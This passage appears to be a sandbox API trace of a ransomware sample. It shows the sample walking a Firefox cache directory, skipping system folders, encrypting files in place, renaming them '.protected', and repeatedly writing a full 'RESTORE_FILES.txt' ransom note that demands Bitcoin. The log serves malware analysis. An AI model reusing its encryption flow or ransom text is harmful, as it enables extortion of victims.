out: lpBuffer=0xcf0090*, lpNumberOfBytesWritten=0x295ddf4*=0x2800, lpOverlapped=0x0) returned 1 [0086.256] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.256] WriteFile (in: hFile=0x160, lpBuffer=0x295ddcc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x295ddcc*, lpNumberOfBytesWritten=0x295ddf4*=0x4, lpOverlapped=0x0) returned 1 [0086.256] WriteFile (in: hFile=0x160, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ddf4*=0x30, lpOverlapped=0x0) returned 1 [0086.256] CloseHandle (hObject=0x160) returned 1 [0086.256] wnsprintfW (in: pszDest=0xcf0090, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\61\\28E95d01.protected") returned 119 [0086.256] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\61\\28E95d01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\9\\61\\28e95d01"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\61\\28E95d01.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\9\\61\\28e95d01.protected")) returned 1 [0086.257] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 0 [0086.257] FindClose (in: hFindFile=0x47bb90 | out: hFindFile=0x47bb90) returned 1 [0086.257] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\61\\RESTORE_FILES.txt") returned 118 [0086.257] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\61\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\9\\61\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0086.257] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0086.258] WriteFile (in: hFile=0x15c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ddf4*=0x53d, lpOverlapped=0x0) returned 1 [0086.258] lstrlenA (lpString="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") returned 684 [0086.258] WriteFile (in: hFile=0x15c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ddf4*=0x2ac, lpOverlapped=0x0) returned 1 [0086.258] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0086.258] WriteFile (in: hFile=0x15c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ddf4*=0xb1, 
lpOverlapped=0x0) returned 1 [0086.258] CloseHandle (hObject=0x15c) returned 1 [0086.258] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 1 [0086.259] lstrcmpiW (lpString1="E0", lpString2="Windows") returned -1 [0086.259] lstrcmpiW (lpString1="E0", lpString2="Program Files") returned -1 [0086.259] lstrcmpiW (lpString1="E0", lpString2="Program Files (x86)") returned -1 [0086.259] lstrcmpiW (lpString1="E0", lpString2="$Recycle.bin") returned 1 [0086.259] lstrcmpiW (lpString1="E0", lpString2="System Volume Information") returned -1 [0086.259] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\E0") returned 100 [0086.259] lstrcmpW (lpString1="E0", lpString2=".") returned 1 [0086.259] lstrcmpW (lpString1="E0", lpString2="..") returned 1 [0086.259] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\E0\\*") returned 102 [0086.259] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\E0\\*", lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 0x47bb90 [0086.259] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0086.259] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0086.259] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0086.259] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0086.260] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0086.260] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\E0\\.") returned 102 [0086.260] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.260] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0086.260] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0086.260] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0086.260] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0086.260] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0086.260] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0086.260] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\E0\\..") returned 103 [0086.260] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.260] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.260] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0086.260] lstrcmpiW (lpString1="F17B2d01", lpString2="Windows") returned -1 [0086.260] lstrcmpiW (lpString1="F17B2d01", lpString2="Program Files") returned -1 [0086.260] lstrcmpiW (lpString1="F17B2d01", lpString2="Program Files (x86)") returned -1 [0086.260] lstrcmpiW (lpString1="F17B2d01", lpString2="$Recycle.bin") returned 1 [0086.260] lstrcmpiW (lpString1="F17B2d01", lpString2="System Volume Information") returned -1 [0086.260] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\E0\\F17B2d01") returned 109 [0086.260] StrStrIW (lpFirst="F17B2d01", lpSrch=".protected") returned 0x0 [0086.260] lstrcmpW (lpString1="F17B2d01", lpString2="RESTORE_FILES.txt") returned -1 [0086.260] CryptGenRandom (in: 
hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ddac | out: pbBuffer=0x295ddac) returned 1 [0086.260] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x30) returned 1 [0086.260] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\E0\\F17B2d01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\9\\e0\\f17b2d01"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0086.261] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\E0\\F17B2d01") returned 109 [0086.261] StrStrW (lpFirst="F17B2d01", lpSrch=".txt") returned 0x0 [0086.261] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\E0\\F17B2d01") returned 109 [0086.261] StrStrW (lpFirst="F17B2d01", lpSrch=".rar") returned 0x0 [0086.261] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\E0\\F17B2d01") returned 109 [0086.261] StrStrW (lpFirst="F17B2d01", lpSrch=".zip") returned 0x0 [0086.261] ReadFile (in: hFile=0x160, lpBuffer=0xcf0090, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xcf0090*, lpNumberOfBytesRead=0x295ddf4*=0x2800, lpOverlapped=0x0) returned 1 [0086.272] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.272] WriteFile (in: hFile=0x160, lpBuffer=0xcf0090*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | 
out: lpBuffer=0xcf0090*, lpNumberOfBytesWritten=0x295ddf4*=0x2800, lpOverlapped=0x0) returned 1 [0086.272] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.272] WriteFile (in: hFile=0x160, lpBuffer=0x295ddcc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x295ddcc*, lpNumberOfBytesWritten=0x295ddf4*=0x4, lpOverlapped=0x0) returned 1 [0086.272] WriteFile (in: hFile=0x160, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ddf4*=0x30, lpOverlapped=0x0) returned 1 [0086.272] CloseHandle (hObject=0x160) returned 1 [0086.272] wnsprintfW (in: pszDest=0xcf0090, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\E0\\F17B2d01.protected") returned 119 [0086.272] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\E0\\F17B2d01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\9\\e0\\f17b2d01"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\E0\\F17B2d01.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\9\\e0\\f17b2d01.protected")) returned 1 [0086.273] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 0 [0086.273] FindClose (in: hFindFile=0x47bb90 | out: hFindFile=0x47bb90) returned 1 [0086.273] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\E0\\RESTORE_FILES.txt") returned 118 [0086.273] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\E0\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\9\\e0\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0086.274] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0086.274] WriteFile (in: hFile=0x15c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ddf4*=0x53d, lpOverlapped=0x0) returned 1 [0086.275] lstrlenA (lpString="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") returned 684 [0086.275] WriteFile (in: hFile=0x15c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ddf4*=0x2ac, lpOverlapped=0x0) returned 1 [0086.275] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0086.275] WriteFile (in: hFile=0x15c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ddf4*=0xb1, 
lpOverlapped=0x0) returned 1 [0086.275] CloseHandle (hObject=0x15c) returned 1 [0086.275] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 0 [0086.275] FindClose (in: hFindFile=0x47bb50 | out: hFindFile=0x47bb50) returned 1 [0086.275] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\RESTORE_FILES.txt") returned 115 [0086.275] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\9\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0086.276] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0086.276] WriteFile (in: hFile=0x158, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e064*=0x53d, lpOverlapped=0x0) returned 1 [0086.276] lstrlenA (lpString="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") returned 684 [0086.277] WriteFile (in: hFile=0x158, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e064*=0x2ac, lpOverlapped=0x0) returned 1 [0086.277] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0086.277] WriteFile (in: hFile=0x158, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e064*=0xb1, 
lpOverlapped=0x0) returned 1 [0086.277] CloseHandle (hObject=0x158) returned 1 [0086.278] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0086.278] lstrcmpiW (lpString1="A", lpString2="Windows") returned -1 [0086.278] lstrcmpiW (lpString1="A", lpString2="Program Files") returned -1 [0086.278] lstrcmpiW (lpString1="A", lpString2="Program Files (x86)") returned -1 [0086.278] lstrcmpiW (lpString1="A", lpString2="$Recycle.bin") returned 1 [0086.278] lstrcmpiW (lpString1="A", lpString2="System Volume Information") returned -1 [0086.278] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\A") returned 97 [0086.278] lstrcmpW (lpString1="A", lpString2=".") returned 1 [0086.278] lstrcmpW (lpString1="A", lpString2="..") returned 1 [0086.278] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\A\\*") returned 99 [0086.278] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\A\\*", lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 0x47bb50 [0086.278] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0086.278] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0086.278] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0086.278] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0086.278] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0086.278] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\A\\.") returned 99 
[0086.278] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.278] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 1 [0086.279] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0086.279] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0086.279] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0086.279] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0086.279] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0086.279] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\A\\..") returned 100 [0086.279] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.279] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.279] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 0 [0086.279] FindClose (in: hFindFile=0x47bb50 | out: hFindFile=0x47bb50) returned 1 [0086.279] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\A\\RESTORE_FILES.txt") returned 115 [0086.279] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\A\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\a\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0086.279] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0086.279] WriteFile (in: hFile=0x158, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e064*=0x53d, lpOverlapped=0x0) returned 1 [0086.280] lstrlenA (lpString="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") returned 684 [0086.280] WriteFile (in: hFile=0x158, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e064*=0x2ac, lpOverlapped=0x0) returned 1 
[0086.280] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0086.280] WriteFile (in: hFile=0x158, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e064*=0xb1, lpOverlapped=0x0) returned 1 [0086.280] CloseHandle (hObject=0x158) returned 1 [0086.280] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0086.280] lstrcmpiW (lpString1="B", lpString2="Windows") returned -1 [0086.280] lstrcmpiW (lpString1="B", lpString2="Program Files") returned -1 [0086.280] lstrcmpiW (lpString1="B", lpString2="Program Files (x86)") returned -1 [0086.280] lstrcmpiW (lpString1="B", lpString2="$Recycle.bin") returned 1 [0086.281] lstrcmpiW (lpString1="B", lpString2="System Volume Information") returned -1 [0086.281] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\B") returned 97 [0086.281] lstrcmpW (lpString1="B", lpString2=".") returned 1 [0086.281] lstrcmpW (lpString1="B", lpString2="..") returned 1 [0086.281] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\B\\*") returned 99 [0086.281] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 